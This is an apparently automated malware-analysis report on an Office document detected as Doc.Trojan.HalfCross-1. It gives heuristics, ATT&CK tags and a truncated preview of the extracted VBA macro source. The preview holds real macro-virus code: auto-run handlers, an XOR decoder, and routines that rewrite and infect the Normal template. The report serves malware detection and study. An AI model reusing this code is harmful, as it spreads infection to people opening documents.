MALICIOUS
Risk Score: 220
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Office document containing VBA macros, with a high-confidence heuristic indicating a Document_Open macro that executes code. The ClamAV detection name 'Doc.Trojan.HalfCross-1' suggests a known malicious document type. The VBA code appears to be obfuscated but the presence of a Document_Open subroutine indicates an attempt to run malicious code automatically when the document is opened, likely for downloading further stages.
Heuristics: 4
- ClamAV: Doc.Trojan.HalfCross-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.HalfCross-1
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35025 bytes |

SHA-256: 72348823eee63da0b1d91395a7762001702172f6e829ca39b6792399824dd176
Detection: ClamAV: Doc.Trojan.HalfCross-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'
' 35
'ThisDocumentN
Private Sub Workbook_Deactivate()
If ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(40, 1) <> "'InRun" Then Call Calculate_AddressX(98, 25)
End Sub
Private Sub Document_Open()
Call Calculate_Address(83, 15)
End Sub
Private Sub Document_Close()
Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule
With Iam: .ReplaceLine 40, "": Z = .CountOflines: Done = Decode(.Lines(73, 10), 230): .InsertLines Z, Done: Mail_Item: .DeleteLines Z, 10: .ReplaceLine Z, "End Sub": End With
Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Comp2 = Iam.Lines(41, 1): NormalTemplate.Saved = True:
CH = Word.ActiveDocument.Characters.Count: Comp = "'" + Str(CH): t = Iam.Lines(42, 1): If t = "" Then Exit Sub
If Comp = Comp2 And t <> "'ThisDocumentA" Then Iam.ReplaceLine 42, "'ThisDocument" & Right$(t, 1): ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument: Exit Sub
If Comp = Comp2 And t = "'ThisDocumentA" Then ActiveDocument.Saved = True: Exit Sub Else: If t <> "'ThisDocumentA" Then Iam.ReplaceLine 42, "'ThisDocument" & t
End Sub
Private Function Calculate_AddressX(Start_Encode As Integer, Code_Lines As Integer)
Set Work_Book = ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule
With Work_Book: Z = .CountOflines: Done = Decode(.Lines(Start_Encode, Code_Lines), 230): .InsertLines Z, Done: Mail_Item: .DeleteLines Z, Code_Lines: .ReplaceLine Z, "End Sub": End With
End Function
Private Function Calculate_Address(Start_Encode As Integer, Code_Lines As Integer)
On Error Resume Next: CH = Word.ActiveDocument.Characters.Count: Comp = "'" + Str(CH)
WhereAmI = Right$(NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(42, 1), 1)
If WhereAmI = "N" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Iam: Z = .CountOflines: Done = Decode(.Lines(Start_Encode, Code_Lines), 230): .InsertLines Z, Done: Mail_Item: .DeleteLines Z, Code_Lines: .ReplaceLine Z, "End Sub": End With: NormalTemplate.Save
ActiveDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine 41, Comp: End Function
Private Function Decode(s, k As Integer)
Dim r: r = "": For F = 1 To Len(s): A = (Mid$(s, F, 1)): If A = Chr(13) Or A = Chr(10) Then r = r + A: GoTo Over
If A = "'" Then A = "": r = r + A: GoTo Over
r = r + Chr((Asc(Mid$(s, F, 1))) Xor k): k = k + 2: If k = 250 Then k = 230
Over: Next F: Decode = r
End Function
... (truncated)